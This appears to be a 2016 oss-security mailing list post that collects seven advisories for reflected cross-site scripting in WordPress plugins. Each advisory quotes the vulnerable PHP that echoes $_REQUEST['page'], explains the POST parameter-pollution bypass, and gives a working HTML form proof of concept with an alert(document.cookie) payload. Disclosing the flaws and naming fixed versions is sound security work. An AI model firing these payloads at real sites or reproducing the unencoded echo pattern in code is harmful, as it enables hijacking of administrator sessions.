Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 17 Jul 2016 10:01:25 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple reflected Cross-Site Scripting vulnerabilities affecting
 seven WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.



------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Email Users WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Email Users
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0012

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Email Users [2] WordPress Plugin
version 4.8.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Email Users version 4.8.3 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Email Users [2] WordPress Plugin allows a WordPress user to send an
email to the registered blog users. Users can send personal emails to
each other. Power users can email groups of users and even notify group
of users of posts. A Cross-Site Scripting vulnerability was found in the
Email Users WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file email_users_user_settings.php and is caused
by the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

<form id="email-users-filter" method="get">
	<!-- For plugins, we also need to ensure that the form posts back to
our current page -->
	<input type="hidden" name="page" value="<?php echo $_REQUEST['page']
?>" />
	<!-- Now we can render the completed list table -->
	<?php $mailusersListTable->search_box(__('Search',
MAILUSERS_I18N_DOMAIN), 'search_id'); ?>
	<?php $mailusersListTable->display() ; ?>
</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=mailusers-user-settings"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_email_users_wordpress_plugin.html
[2] https://wordpress.org/plugins/email-users/
[3] https://downloads.wordpress.org/plugin/email-users.4.8.3.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Google Forms WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Google Forms
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0021

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Google Forms [2] WordPress Plugin
version 0.84.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Google Forms version 0.85 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Google Forms [2] WordPress Plugin embeds a published, public Google
Form in a WordPress post, page, or widget. A Cross-Site Scripting
vulnerability was found in the Google Forms WordPress Plugin. This issue
allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a malicious
website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file wpgform-logging.php and is caused by the
lack of output encoding on the page request parameter. The vulnerable
code is listed below.

<form id="wpgform-log-entries-filter" method="get">
	<!-- For plugins, we also need to ensure that the form posts back to
our current page -->
	<input type="hidden" name="post_type" value="<?php echo
WPGFORM_CPT_FORM ?>" />
	<input type="hidden" name="page" value="<?php echo $_REQUEST['page']
?>" />
	<input type="hidden" name="_wp_http_referer" value="<?php echo
admin_url('edit.php?post_type=' . WPGFORM_CPT_FORM . 
'&amp;page=wpgform-entry-log-page' ); ?>" />
	<!-- Now we can render the completed list table -->
	<?php //$wpgformListTable->search_box(__('Search',
WPGFORM_I18N_DOMAIN), 'search_id'); ?>
	<?php $wpgformListTable->display() ; ?>
</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/edit.php?post_type=wpgform&page=wpgform-entry-log-page"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_google_forms_wordpress_plugin.html
[2] https://wordpress.org/plugins/wpgform/
[3] https://downloads.wordpress.org/plugin/wpgform.0.85.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Master Slider WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Master Slider
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0013

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Master Slider - Responsive Touch
Slider [2] WordPress Plugin version 2.7.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Master Slider version 2.8.0 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Master Slider [2] WordPress Plugin  is a free responsive image and
content slider with super smooth hardware accelerated transitions. It
supports touch navigation with pure swipe gesture that you have never
experienced before. It's a truly responsive and device friendly slider
which works perfectly in all major devices. A Cross-Site Scripting
vulnerability was found in the Master Slider WordPress Plugin. This
issue allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a malicious
website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file class-msp-list-table.php and is caused by
the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

return sprintf('<a
href="?page=%s&action=%s&slider_id=%s">%s</a>',$_REQUEST['page'],'edit',
$item['ID'], $item['title'] );
	
[...]
	
$buttons .= sprintf( '<a class="action-duplicate msp-ac-btn msp-btn-gray
msp-iconic"
href="?page=%s&action=%s&slider_id=%s%s"><span></span>%s</a>',$_REQUEST['page'],'duplicate'
 ,$item['ID'], $paged_arg, __('duplicate') );
	
[...]
	
$buttons .= sprintf( '<a class="action-delete msp-ac-btn msp-btn-red
msp-iconic" href="?page=%s&action=%s&slider_id=%s%s" onClick="return
confirm(\'%s\');" ><span></span>%s</a>', $_REQUEST['page'],'delete'
,$item['ID'], 
	
[...]
	
$buttons .= sprintf( '<a class="action-preview msp-ac-btn msp-btn-blue
msp-iconic" href="?page=%s&action=%s&slider_id=%s"
onClick="lunchMastersliderPreviewBySliderID(%s);return false;"
><span></span>%s</a>',$_REQUEST['page'],'preview' ,$item['ID'],
$item['ID'], __('preview') );


Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=master-slider"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_master_slider_wordpress_plugin.html
[2] https://wordpress.org/plugins/master-slider/
[3] https://downloads.wordpress.org/plugin/master-slider.2.8.0.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Profile Builder WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Profile Builder
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0014

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Profile Builder - front-end user
registration, user profile and user login [2] WordPress Plugin version
2.4.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Profile Builder version 2.4.2 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Profile Builder [2] WordPress Plugin is a simple to use profile
plugin allowing front-end login, user registration and edit profile by
using shortcodes. A Cross-Site Scripting vulnerability was found in the
Profile Builder WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file class-email-confirmation.php and is caused
by the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

<form id="movies-filter" method="get">
	<!-- For plugins, we also need to ensure that the form posts back to
our current page -->
	<input type="hidden" name="page" value="<?php echo $_REQUEST['page']
?>" />
	<!-- Now we can render the completed list table -->
	<?php $listTable->display() ?>
</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/users.php?page=unconfirmed_emails"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_profile_builder_wordpress_plugin.html
[2] https://wordpress.org/plugins/profile-builder/
[3] https://downloads.wordpress.org/plugin/profile-builder.2.4.2.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Simple Membership WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Simple Membership
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0016

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Simple Membership [2] WordPress
Plugin version 3.2.8.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Simple Membership version 3.2.9 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Simple Membership [2] WordPress Plugin adds membership functionality
to your site. Protect members only content using content protection
easily. A Cross-Site Scripting vulnerability was found in the Simple
Membership WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in several PHP files and is caused by the lack of
output encoding on the page request parameter. The vulnerable code is
listed below.

class.swpm-members.php:

'edit' => sprintf('<a
href="admin.php?page=%s&member_action=edit&member_id=%s">Edit</a>',
$_REQUEST['page'], $item['member_id']),
	
[...]
	
onclick="return confirm(\'Are you sure you want to delete this
entry?\')">Delete</a>', $_REQUEST['page'], $item['member_id']),


class.swpm-membership-levels.php:

'edit' => sprintf('<a
href="admin.php?page=%s&level_action=edit&id=%s">Edit</a>',
$_REQUEST['page'], $item['id']),
	
[...]
	
onclick="return confirm(\'Are you sure you want to delete this
entry?\')">Delete</a>', $_REQUEST['page'], $item['id']),

admin_members_list.php:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page'];
?>" />


admin_all_payment_transactions.php:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page'];
?>" />

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=simple_wp_membership"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_simple_membership_wordpress_plugin.html
[2] https://wordpress.org/plugins/simple-membership/
[3] https://downloads.wordpress.org/plugin/simple-membership.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Top 10 - Popular posts plugin for
WordPress
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Top 10 - Popular
posts WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0017

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Top 10 - Popular posts plugin for
WordPress [2] WordPress Plugin version 2.3.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Top 10 version 2.3.1 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Top 10 - Popular posts plugin for WordPress [2] WordPress Plugin
tracks daily and total visits on blog posts. Display the count as well
as popular and trending posts. A Cross-Site Scripting vulnerability was
found in the Top 10 WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file class-stats.php and is caused by the lack
of output encoding on the page request parameter. The vulnerable code is
listed below.

<form method="get">
	<input type="hidden" name="page" value="<?php echo $_REQUEST['page']
?>" />
	<?php
	// If this is a search?
	if ( isset( $_REQUEST['s'] ) ) {
		$args['search'] = esc_sql( $_REQUEST['s'] );
	}
	
[...]
	
</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter. 


------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=tptn_popular_posts"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_top_10___popular_posts_plugin_for_wordpress.html
[2] https://wordpress.org/plugins/top-10/
[3] https://downloads.wordpress.org/plugin/top-10.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in WP No External Links WordPress
Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WP No External
Links WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0020

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP No External Links [2] WordPress
Plugin version 3.5.15.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WP No External Links version 3.5.16 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WP No External Links [2] WordPress Plugin masks all external links -
make them internal or hide. On your own posts, comments pages, and
authors page. A Cross-Site Scripting vulnerability was found in the WP
No External Links WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file wp-noexternallinks-options.php and is
caused by the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

<a href="?page=<?php echo $_REQUEST['page']; ?>"
	
[...]
	
<a href="?page=<?php echo $_REQUEST['page']; ?>&action=stats"
	
[...]
	
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'];
?>">

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=wp-noexternallinks/wp-noexternallinks-options.php"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_no_external_links_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-noexternallinks/
[3] https://downloads.wordpress.org/plugin/wp-noexternallinks.3.5.16.zip

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ